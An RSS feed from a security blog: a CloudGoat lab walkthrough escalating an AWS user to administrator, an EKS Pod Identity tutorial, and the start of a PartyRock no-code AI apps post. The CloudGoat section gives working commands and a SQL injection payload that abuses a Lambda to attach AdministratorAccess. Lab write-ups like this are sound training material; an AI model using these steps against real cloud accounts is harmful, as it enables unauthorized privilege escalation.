<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Rewanth Tammana's Blog]]></title><description><![CDATA[Rewanth Tammana is a security ninja, open-source contributor, and Senior Security Architect. He is passionate about DevSecOps, Application, and Container Securi]]></description><link>https://blog.rewanthtammana.com</link><generator>RSS for Node</generator><lastBuildDate>Sat, 11 Apr 2026 14:08:51 GMT</lastBuildDate><atom:link href="https://blog.rewanthtammana.com/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><item><title><![CDATA[CloudGoat 2.0 - vulnerable_lambda]]></title><description><![CDATA[vulnerable_lambda is one of the scenarios from CloudGoat - An intentionally vulnerable by design AWS setup.
Difficulty: Easy
Hands-On
Task
Initialize the terraform script to set the vulnerable scenario on your AWS account.
./cloudgoat.py create vulne...]]></description><link>https://blog.rewanthtammana.com/vulnerable-lambda</link><guid isPermaLink="true">https://blog.rewanthtammana.com/vulnerable-lambda</guid><category><![CDATA[cloudgoat]]></category><category><![CDATA[AWS]]></category><category><![CDATA[IAM]]></category><category><![CDATA[lambda]]></category><category><![CDATA[Applications]]></category><category><![CDATA[Security]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Tue, 26 Dec 2023 13:42:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1703594084123/452d7cc4-a71a-4b6b-9225-7d32abe093b1.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><a target="_blank" href="https://github.com/RhinoSecurityLabs/cloudgoat/blob/master/scenarios/vulnerable_lambda/README.md">vulnerable_lambda</a> is one of the scenarios from <a target="_blank" href="https://github.com/RhinoSecurityLabs/cloudgoat">CloudGoat</a> - An intentionally vulnerable by design AWS setup.</p>
<p>Difficulty: Easy</p>
<h2 id="heading-hands-on">Hands-On</h2>
<h3 id="heading-task">Task</h3>
<p>Initialize the terraform script to set the vulnerable scenario on your AWS account.</p>
<pre><code class="lang-bash">./cloudgoat.py create vulnerable_lambda
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700635525120/04f31305-fa88-4646-a3e9-b46cac4a146a.png" alt class="image--center mx-auto" /></p>
<p>Once the setup is complete, the new account credentials will be available in the below file.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700635721192/8fe9b6bb-4d87-4ad4-97dd-c810af536621.png" alt class="image--center mx-auto" /></p>
<p>The task is to use these credentials to authenticate as a low-privileged user &amp; escalate privileges in the cloud environment.</p>
<h3 id="heading-hints">Hints</h3>
<p>The creator leaves us some hints to leverage &amp; fast-track the win.</p>
<p><img src="https://github.com/RhinoSecurityLabs/cloudgoat/raw/master/scenarios/vulnerable_lambda/exploitation_route.png" alt="Lucidchart Diagram" /></p>
<h3 id="heading-solution">Solution</h3>
<p>Authenticate using the new credentials. We use the <code>bilbo</code> user (seen in the hints screenshot).</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Uses stdout instead of vim to show output</span>
<span class="hljs-built_in">export</span> AWS_PAGER=
aws configure --profile bilbo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700636742592/63dfc6a2-9357-4b43-9e83-571e2285e599.png" alt class="image--center mx-auto" /></p>
<p>Check the user ID and account information</p>
<pre><code class="lang-bash">aws sts get-caller-identity --profile bilbo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700636884016/8d7c0279-f6c9-4658-88b5-3b0473bf0f67.png" alt class="image--center mx-auto" /></p>
<p>In the hints screenshot, it says "List IAM roles". Let's do that.</p>
<pre><code class="lang-bash">aws iam list-roles --profile bilbo | jq <span class="hljs-string">'.Roles[].RoleName'</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700637347388/b61a6a9b-ad56-4597-8e44-09d24166bdaa.png" alt class="image--center mx-auto" /></p>
<p>Among tens of roles, these two stand out, considering we are solving the <code>vulnerable_lambda</code> challenge. Let's see what they are made of!</p>
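<p>If the list is long, a quick filter helps. CloudGoat prefixes the resources it creates with <code>cg-</code>, so (a small helper, assuming that naming convention):</p>
<pre><code class="lang-bash"># Show only the CloudGoat-created roles
aws iam list-roles --profile bilbo | jq -r '.Roles[].RoleName' | grep '^cg-'
</code></pre>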
<p>The <code>&lt;role_name&gt;</code> in the below command will be different for you as it's randomly generated. Replace it accordingly.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> ROLE_NAME=cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10
aws iam get-role --profile bilbo --role-name <span class="hljs-variable">$ROLE_NAME</span> | jq -r <span class="hljs-string">'.Role.AssumeRolePolicyDocument.Statement'</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700637657093/3035674a-eddb-4a63-9c8a-9a688f2e25d9.png" alt class="image--center mx-auto" /></p>
<p>We have two roles - one can be assumed by the current user &amp; the other can be assumed by the Lambda service. Let's assume the <code>cg-lambda-invoker-...</code> role. To assume the role, we need its ARN.</p>
<pre><code class="lang-bash">aws iam get-role --profile bilbo --role-name <span class="hljs-variable">$ROLE_NAME</span> | jq -r <span class="hljs-string">'.Role.Arn'</span>
</code></pre>
<p>Use the ARN from above to assume the role.</p>
<pre><code class="lang-bash">aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638264685/370ae921-6ee4-4af8-b225-b3c2e797bb5e.png" alt class="image--center mx-auto" /></p>
<p>Create a new profile with this assumed role or export them as environment variables</p>
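<p>For the first option, the temporary credentials can be written into a named profile with <code>aws configure set</code>. A minimal sketch (the <code>lambda-invoker</code> profile name is arbitrary); the environment-variable route is shown right below:</p>
<pre><code class="lang-bash"># Capture the assumed-role credentials and store them in a named profile
creds=$(aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session)
aws configure set aws_access_key_id "$(echo $creds | jq -r '.Credentials.AccessKeyId')" --profile lambda-invoker
aws configure set aws_secret_access_key "$(echo $creds | jq -r '.Credentials.SecretAccessKey')" --profile lambda-invoker
aws configure set aws_session_token "$(echo $creds | jq -r '.Credentials.SessionToken')" --profile lambda-invoker
aws sts get-caller-identity --profile lambda-invoker
</code></pre>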
<pre><code class="lang-bash">output=$(aws sts assume-role --profile bilbo --role-arn arn:aws:iam::558267956267:role/cg-lambda-invoker-vulnerable_lambda_cgid0isrortd10 --role-session-name vulnerable-lambda-session)
<span class="hljs-built_in">export</span> AWS_ACCESS_KEY_ID=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$output</span> | jq -r <span class="hljs-string">'.Credentials.AccessKeyId'</span>)
<span class="hljs-built_in">export</span> AWS_SECRET_ACCESS_KEY=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$output</span> | jq -r <span class="hljs-string">'.Credentials.SecretAccessKey'</span>)
<span class="hljs-built_in">export</span> AWS_SESSION_TOKEN=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$output</span> | jq -r <span class="hljs-string">'.Credentials.SessionToken'</span>)
aws sts get-caller-identity
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638485982/3caffc8b-1a35-4c89-9945-4d2afab59f5c.png" alt class="image--center mx-auto" /></p>
<p>We can see the current ARN points to <code>vulnerable-lambda-session</code>, so we are on the right path. Since this role is capable of performing lambda operations, let's list the lambda functions.</p>
<h4 id="heading-lambda-functions-amp-analysis">Lambda functions &amp; analysis</h4>
<pre><code class="lang-bash">aws lambda list-functions
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638729879/ee6445fa-37d3-4212-8c78-754fe16183e9.png" alt class="image--center mx-auto" /></p>
<p>In the description, we can see, <code>This function will apply a managed policy to the user of your choice, so long as the database says that it's okay...</code></p>
<p>If that's true, we can add a managed policy like <code>AdministratorAccess</code> to our user &amp; elevate the privileges. To validate, let's download the source code.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Get function name</span>
aws lambda list-functions | jq -r <span class="hljs-string">'.Functions[].FunctionName'</span>
aws lambda get-function --function-name $(aws lambda list-functions | jq -r <span class="hljs-string">'.Functions[].FunctionName'</span>) |  jq -r <span class="hljs-string">'.Code'</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700638845117/ae6bc63b-e3fc-4e44-9e78-9cc5107dc619.png" alt class="image--center mx-auto" /></p>
<p>Download the source code from this location.</p>
<pre><code class="lang-bash">mkdir /tmp/<span class="hljs-built_in">test</span>
wget -O /tmp/<span class="hljs-built_in">test</span>/download.zip $(aws lambda get-function --function-name $(aws lambda list-functions | jq -r <span class="hljs-string">'.Functions[].FunctionName'</span>) | jq -r <span class="hljs-string">'.Code.Location'</span>)
<span class="hljs-built_in">cd</span> /tmp/<span class="hljs-built_in">test</span>
unzip download.zip
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700639024384/7aebc850-f367-4540-93e2-e03b15ff6944.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700639094644/f02cf042-28c4-499a-a484-8009b95c1fdb.png" alt class="image--center mx-auto" /></p>
<p>If you scroll to the end of <code>main.py</code>, you can see the payload structure used to invoke the lambda function.</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"policy_names"</span>: [
        <span class="hljs-string">"AmazonSNSReadOnlyAccess"</span>,
        <span class="hljs-string">"AWSLambda_ReadOnlyAccess"</span>
    ],
    <span class="hljs-attr">"user_name"</span>: <span class="hljs-string">"cg-bilbo-user"</span>
}
</code></pre>
<p>Check the username of the <code>bilbo</code> profile user.</p>
<pre><code class="lang-bash">aws sts get-caller-identity --profile bilbo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809062088/cf05f79e-77d7-41d2-8604-edb0f60507c9.png" alt class="image--center mx-auto" /></p>
<p>Now, let's use this bilbo user &amp; try to assign overprivileged permissions. In my case, the <code>user_name</code> is <code>cg-bilbo-vulnerable_lambda_cgid0isrortd10</code>. Save the below information to <code>payload.json</code>.</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"policy_names"</span>: [
        <span class="hljs-string">"AmazonSNSReadOnlyAccess"</span>,
        <span class="hljs-string">"AWSLambda_ReadOnlyAccess"</span>,
        <span class="hljs-string">"AdministratorAccess"</span>
    ],
    <span class="hljs-attr">"user_name"</span>: <span class="hljs-string">"cg-bilbo-vulnerable_lambda_cgid0isrortd10"</span>
}
</code></pre>
<p>Let's use the assumed role, which has permission to invoke lambda functions, &amp; pass this file as input.</p>
<pre><code class="lang-bash">aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809733527/a40e0df0-ff64-408d-8265-6072dc189319.png" alt class="image--center mx-auto" /></p>
<p>If you see the output, it says <code>AdministratorAccess</code> isn't an approved policy.</p>
<h4 id="heading-sql-injection">SQL Injection</h4>
<p>If you look at the <code>main.py</code> code, there's no validation on user input, which opens up the possibility of SQL injection.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809851101/17861a5d-c030-455a-a355-38779e7492b0.png" alt class="image--center mx-auto" /></p>
<p>Let's craft a payload with SQL injection: closing the string with a quote &amp; commenting out the rest of the query with <code>--</code> bypasses the check that the policy must be marked as approved in the database.</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"policy_names"</span>: [
        <span class="hljs-string">"AmazonSNSReadOnlyAccess"</span>,
        <span class="hljs-string">"AWSLambda_ReadOnlyAccess"</span>,
        <span class="hljs-string">"AdministratorAccess' --"</span>
    ],
    <span class="hljs-attr">"user_name"</span>: <span class="hljs-string">"cg-bilbo-vulnerable_lambda_cgid0isrortd10"</span>
}
</code></pre>
<p>Invoke the lambda function!</p>
<pre><code class="lang-bash">aws lambda invoke --function-name vulnerable_lambda_cgid0isrortd10-policy_applier_lambda1 --payload file://./payload.json --cli-binary-format raw-in-base64-out out.txt
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700809971048/74d15615-9e0a-42d0-83cd-852e56ee6491.png" alt class="image--center mx-auto" /></p>
<p>Let's check the permissions of the <code>bilbo</code> user now, using <code>list-attached-user-policies</code>.</p>
<pre><code class="lang-bash">aws sts get-caller-identity --profile bilbo <span class="hljs-comment"># Get user-name from here</span>
aws iam list-attached-user-policies --profile bilbo --user-name cg-bilbo-vulnerable_lambda_cgid0isrortd10
</code></pre>
<p>As you can see in the output, we now have <code>AdministratorAccess</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700810159162/5d4f2a8c-90e2-4672-9c52-d805921425bf.png" alt class="image--center mx-auto" /></p>
<p>We successfully elevated our privileges to administrator.</p>
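<p>Once you are done, tear the scenario down so the intentionally vulnerable resources don't linger in your account:</p>
<pre><code class="lang-bash">./cloudgoat.py destroy vulnerable_lambda
</code></pre>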
]]></content:encoded></item><item><title><![CDATA[Rethinking Authentication: AWS ReInvent 2023 Unveils EKS Pod Identity]]></title><description><![CDATA[Two weeks ago at AWS ReInvent, the AWS team released a new add-on for the EKS cluster. This feature simplifies the access to AWS services from EKS pods. This blog is a hands-on demonstration & exploration of this feature.
Scenario
To demonstrate the ...]]></description><link>https://blog.rewanthtammana.com/rethinking-authentication-aws-reinvent-2023-unveils-eks-pod-identity</link><guid isPermaLink="true">https://blog.rewanthtammana.com/rethinking-authentication-aws-reinvent-2023-unveils-eks-pod-identity</guid><category><![CDATA[AWS]]></category><category><![CDATA[reInvent]]></category><category><![CDATA[EKS]]></category><category><![CDATA[Security]]></category><category><![CDATA[authentication]]></category><category><![CDATA[Kubernetes]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 13 Dec 2023 11:03:44 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1702449112970/bffe13bb-3cd4-4d73-b920-1c9eb7e2ee64.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Two weeks ago at <a target="_blank" href="https://aws.amazon.com/about-aws/whats-new/2023/11/amazon-eks-pod-identity/">AWS ReInvent</a>, the AWS team released a new add-on for the EKS cluster. This feature simplifies the access to AWS services from EKS pods. This blog is a hands-on demonstration &amp; exploration of this feature.</p>
<h2 id="heading-scenario">Scenario</h2>
<p>To demonstrate the new feature, I'll borrow a scenario from my <a target="_blank" href="https://blog.rewanthtammana.com/securing-aws-eks-implementing-least-privilege-access-with-irsa#heading-scenario">previous article on IRSA (IAM Roles for Service Accounts)</a>. In short, we will deploy an application on EKS that fetches random images from the internet every 30 seconds, &amp; uploads them to an s3 bucket. Only this time, instead of IRSA, we will use this new feature.</p>
<pre><code class="lang-bash">IMAGE=rewanthtammana/secure-eks:pod-identity-demo
git <span class="hljs-built_in">clone</span> https://github.com/rewanthtammana/secure-eks
<span class="hljs-built_in">cd</span> secure-eks/pod-identity-demo
docker build -t <span class="hljs-variable">$IMAGE</span> .
docker push <span class="hljs-variable">$IMAGE</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702212677048/ccad27a0-fb9c-4fe8-a966-92cdae8857ba.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-hands-on-demo">Hands-on Demo</h2>
<p>Let's create an EKS cluster to experiment.</p>
<pre><code class="lang-yaml"><span class="hljs-comment">#config.yaml</span>
<span class="hljs-attr">apiVersion:</span> <span class="hljs-string">eksctl.io/v1alpha5</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterConfig</span>

<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">pod-identity-demo</span>
  <span class="hljs-attr">region:</span> <span class="hljs-string">us-east-1</span>
  <span class="hljs-attr">version:</span> <span class="hljs-string">'1.26'</span>

<span class="hljs-attr">nodeGroups:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">ng-general</span>
    <span class="hljs-attr">instanceType:</span> <span class="hljs-string">t2.small</span>
    <span class="hljs-attr">instanceName:</span> <span class="hljs-string">pod-identity-demo-node</span>
    <span class="hljs-attr">desiredCapacity:</span> <span class="hljs-number">1</span>
</code></pre>
<pre><code class="lang-bash">eksctl create cluster -f config.yaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702212796425/4cabef21-a258-447d-9d20-3f6946771f19.png" alt class="image--center mx-auto" /></p>
<p>List the cluster.</p>
<pre><code class="lang-bash">eksctl get clusters
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702205929527/af793996-cce8-4c06-87ba-c93e66358df3.png" alt class="image--center mx-auto" /></p>
<p><code>eksctl</code> added support for this feature in a recent release. Make sure your <code>eksctl</code> is up to date.</p>
<pre><code class="lang-bash">eksctl version
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206031156/1cb839e7-89b6-489a-8346-0a998a737c8b.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-enable-add-on">Enable Add On</h3>
<p>We need the <code>eks-pod-identity-agent</code> add-on, which deploys the agent that hands out credentials to pods using this feature.</p>
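<p>Set the cluster name first (the value from <code>config.yaml</code>); it is also used in later sections. Note that the <code>$policy_arn</code> referenced in the association command below is the S3 write policy created in the "Pod Identity Association" section, so create it beforehand if you're following along linearly.</p>
<pre><code class="lang-bash"># Cluster name from config.yaml; reused in later sections
export CLUSTER_NAME=pod-identity-demo
</code></pre>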
<pre><code class="lang-bash">eksctl create addon --name eks-pod-identity-agent --cluster <span class="hljs-variable">$CLUSTER_NAME</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206514451/c489b653-cbd4-48c8-be9a-57991e626478.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">kubectl get ds -A
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206624923/863020ad-210a-4b22-bfc5-fbd523d70349.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> SERVICE_ACCOUNT_NAME=anything
eksctl create podidentityassociation --cluster <span class="hljs-variable">$CLUSTER_NAME</span> --namespace default --service-account-name <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span> --permission-policy-arns <span class="hljs-variable">$policy_arn</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206664021/5d8a8c06-f2fe-4310-ada9-06b2816592b6.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">aws cloudformation describe-stack-resources --stack-name eksctl-pod-identity-demo-podidentityrole-ns-default-sa-anything
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206979222/fbce0047-48ab-4636-9a01-3d72e0999a8a.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> role_name=$(aws cloudformation describe-stack-resources --stack-name eksctl-pod-identity-demo-podidentityrole-ns-default-sa-anything | jq -r <span class="hljs-string">'.StackResources[].PhysicalResourceId'</span>)
<span class="hljs-built_in">echo</span> <span class="hljs-variable">$role_name</span>
aws iam list-attached-role-policies --role-name <span class="hljs-variable">$role_name</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207078257/53bf8126-4af2-40b1-ae1e-df93042ad58b.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-pod-identity-association">Pod Identity Association</h3>
<p>List the <code>podidentityassociation</code> in the EKS clusters.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> CLUSTER_NAME=pod-identity-demo
eksctl get podidentityassociation --cluster <span class="hljs-variable">$CLUSTER_NAME</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702205981148/a82e0cfd-51ba-4b84-bd04-5ebd567483c7.png" alt class="image--center mx-auto" /></p>
<p>Create an AWS policy to write objects to an s3 bucket.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> BUCKET_NAME=random-pod-identity-demo
<span class="hljs-built_in">echo</span> <span class="hljs-string">"{
    \"Version\": \"2012-10-17\",
    \"Statement\": [
        {
            \"Effect\": \"Allow\",
            \"Action\": [
                \"s3:PutObject\"
            ],
            \"Resource\": [
                \"arn:aws:s3:::<span class="hljs-variable">$BUCKET_NAME</span>/*\"
            ]
        }
    ]
}"</span> &gt; s3-<span class="hljs-variable">$BUCKET_NAME</span>-access.json

<span class="hljs-built_in">export</span> POLICY_NAME=pod-identity-bucket-s3-write-policy
<span class="hljs-built_in">export</span> create_policy_output=$(aws iam create-policy --policy-name <span class="hljs-variable">$POLICY_NAME</span> --policy-document file://s3-<span class="hljs-variable">$BUCKET_NAME</span>-access.json)
<span class="hljs-built_in">export</span> policy_arn=$(<span class="hljs-built_in">echo</span> <span class="hljs-variable">$create_policy_output</span> | jq -r <span class="hljs-string">'.Policy.Arn'</span>)
<span class="hljs-built_in">echo</span> <span class="hljs-variable">$policy_arn</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702206213559/1084523c-dccb-47fe-be4a-f7fb819f60f8.png" alt class="image--center mx-auto" /></p>
<p>Create the S3 bucket, create the service account referenced in the podidentityassociation, &amp; create a job using that service account to upload pictures to the S3 bucket.</p>
<pre><code class="lang-bash">aws s3 mb s3://<span class="hljs-variable">$BUCKET_NAME</span> --region us-east-1
kubectl create sa <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span>

<span class="hljs-built_in">echo</span> <span class="hljs-string">"apiVersion: batch/v1
kind: Job
metadata:
  name: pod-identity-demo
spec:
  template:
    spec:
      serviceAccountName: <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span>
      containers:
      - name: pod-identity-demo-container
        image: rewanthtammana/secure-eks:pod-identity-demo
        env:
        - name: AWS_REGION
          value: us-east-1
        - name: S3_BUCKET_NAME
          value: <span class="hljs-variable">$BUCKET_NAME</span>
      restartPolicy: Never"</span> | kubectl apply -f-
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207491885/30799d6b-1a18-485f-94b4-10ef4f9818d9.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">kubectl get <span class="hljs-built_in">jobs</span>
kubectl get po -l job-name=pod-identity-demo
kubectl logs -l job-name=pod-identity-demo
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207626164/def0a47e-82bf-4cb1-a36e-408bd3665a08.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-irsa-vs-pod-identity">IRSA vs Pod Identity</h2>
<p>How does this feature differ from IRSA?</p>
<p>To analyze, let's create a service account that will be used in an IRSA fashion.</p>
<pre><code class="lang-bash">eksctl utils associate-iam-oidc-provider \
  --cluster <span class="hljs-variable">$CLUSTER_NAME</span> \
  --approve
eksctl create iamserviceaccount --name irsa-demo \
  --namespace default \
  --cluster <span class="hljs-variable">$CLUSTER_NAME</span> \
  --attach-policy-arn <span class="hljs-variable">$policy_arn</span> \
  --approve
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207869319/7d890eea-6a46-46d8-81c0-da310c69c61d.png" alt class="image--center mx-auto" /></p>
<p>The <code>anything</code> service account is used by the Pod Identity feature, while the <code>irsa-demo</code> service account is used by IRSA. The key difference is in the annotations: the IRSA service account carries an <code>eks.amazonaws.com/role-arn</code> annotation pointing to its IAM role, whereas the Pod Identity service account has no such annotation; the mapping lives in the pod identity association.</p>
<pre><code class="lang-bash">kubectl get sa
kubectl get sa <span class="hljs-variable">$SERVICE_ACCOUNT_NAME</span> -oyaml
kubectl get sa irsa-demo -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702207975242/b152cfaa-f1aa-4dae-952f-36f3f629b73a.png" alt class="image--center mx-auto" /></p>
<p>In the case of IRSA, there's no direct way to identify the list of service accounts that are leveraging IRSA, performing actions, etc. We can definitely have automation &amp; scripts in place to extract the required information, but it's tedious. With this new AWS feature, this gets a lot easier.</p>
<pre><code class="lang-bash">eksctl get podidentityassociation
</code></pre>
<h3 id="heading-inside-of-pod-identity-webhook">Inside of Pod Identity Webhook</h3>
<pre><code class="lang-bash">kubectl get po
kubectl <span class="hljs-built_in">exec</span> -it pod-identity-demo-h49cc sh
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208137422/270a522a-4cf6-46b4-a358-07cf61705d92.png" alt class="image--center mx-auto" /></p>
<p>When the new feature add-on is enabled, it creates a daemon set that's responsible for all authentication operations &amp; validations.</p>
<pre><code class="lang-bash">kubectl get ds -n kube-system eks-pod-identity-agent -oyaml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208573305/96b76e07-d55b-48eb-a87f-4db55c35c34c.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-bash">kubectl logs -n kube-system eks-pod-identity-agent-x5wml
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208721565/f526d4ae-dd65-4b39-9f41-9755385e1ad6.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-cleanup">Cleanup</h2>
<pre><code class="lang-bash">aws iam delete-policy --policy-arn <span class="hljs-variable">$policy_arn</span>
aws s3 rm s3://<span class="hljs-variable">$BUCKET_NAME</span> --recursive
aws s3 rb s3://<span class="hljs-variable">$BUCKET_NAME</span>
eksctl delete cluster --name <span class="hljs-variable">$CLUSTER_NAME</span>
</code></pre>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1702208950974/58627432-cb94-43ac-bb41-f0bbb1d3c767.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-conclusion">Conclusion</h2>
<p>EKS Pod Identity provides a new simplified &amp; secure way to allow EKS pods to connect with other AWS services. Though AWS has IRSA, managing it at scale is a relatively tedious task when compared with <code>eks-pod-identity-agent</code>.</p>
<p><code>eksctl get podidentityassociation</code> lists all the service accounts that are connecting with other AWS resources. Subsequently, we can list all pods using those service accounts to see which resources have elevated permissions &amp; audit them.</p>
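<p>For example, a quick way to list the pods in a namespace that use one of those service accounts (a small sketch using <code>jq</code>):</p>
<pre><code class="lang-bash"># Pods in the default namespace bound to the pod-identity service account
kubectl get pods -n default -o json | jq -r --arg sa "$SERVICE_ACCOUNT_NAME" \
  '.items[] | select(.spec.serviceAccountName == $sa) | .metadata.name'
</code></pre>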
]]></content:encoded></item><item><title><![CDATA[No Code? No Problem! Crafting AI Apps with AWS PartyRock]]></title><description><![CDATA[Generative AI, LLMs, & GPTs are the buzzwords these days. Every day numerous tools & websites are launched with AI offerings. Most often, the best ones are expensive to afford & the free ones won't give desired results.
Just a week ago, AWS launched ...]]></description><link>https://blog.rewanthtammana.com/no-code-no-problem-crafting-ai-apps-with-aws-partyrock</link><guid isPermaLink="true">https://blog.rewanthtammana.com/no-code-no-problem-crafting-ai-apps-with-aws-partyrock</guid><category><![CDATA[AWS]]></category><category><![CDATA[No Code]]></category><category><![CDATA[Amazon Bedrock]]></category><category><![CDATA[generative ai]]></category><dc:creator><![CDATA[Rewanth Tammana]]></dc:creator><pubDate>Wed, 29 Nov 2023 11:33:40 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1701008056042/8018eefb-89eb-4eb0-8753-e47f00838763.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Generative AI, LLMs, &amp; GPTs are the buzzwords these days. Every day numerous tools &amp; websites are launched with AI offerings. Most often, the best ones are expensive to afford &amp; the free ones won't give desired results.</p>
<p>Just a week ago, AWS launched <a target="_blank" href="https://aws.amazon.com/about-aws/whats-new/2023/11/partyrock-amazon-bedrock-playground/">PartyRock</a>, an <a target="_blank" href="https://aws.amazon.com/bedrock/">Amazon Bedrock Playground</a>. It's a Generative AI app-building platform. No code required, just a web interface that takes text &amp; generates the desired apps. The best part is it's free of cost &amp; doesn't require an AWS account.</p>
<p>We will create a few apps to benchmark the capability of the platform.</p>
<h3 id="heading-coursefinder-tailored-learning-pathways">CourseFinder: Tailored Learning Pathways</h3>
<p>We want to learn new things but with access to unlimited content on the internet, it's hard to find the right path. <a target="_blank" href="https://partyrock.aws/u/testinguser883/dsDXBSfex/CourseFinder">This CourseFinder app</a> takes input from you &amp; suggests the best courses available. The best part is once you review the results, you can enter the timeframe you have to spend on it &amp; it suggests a tailored path for that timeframe.</p>
<p>The path to learning "iPhone photography".</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1700999800220/6a4ebec0-f2fd-4749-9387-264ee6e370e9.png" alt class="image--center mx-auto" /></p>
<p>The path to learning "Asian cooking".</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701000119739/e87dc69f-efb6-48f2-b071-c060b10129fc.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-storytelling-an-innovative-approach">Storytelling: An Innovative Approach</h3>
<p>Kids and adults love stories &amp; movies. We sometimes wonder what would happen if the storyline took an alternative path once in a while. <a target="_blank" href="https://partyrock.aws/u/testinguser883/gd1rXnaMP/StoryPathGenerator">This app</a> generates multiple directions the story can take; you can choose any option for the way forward &amp; it generates an image.</p>
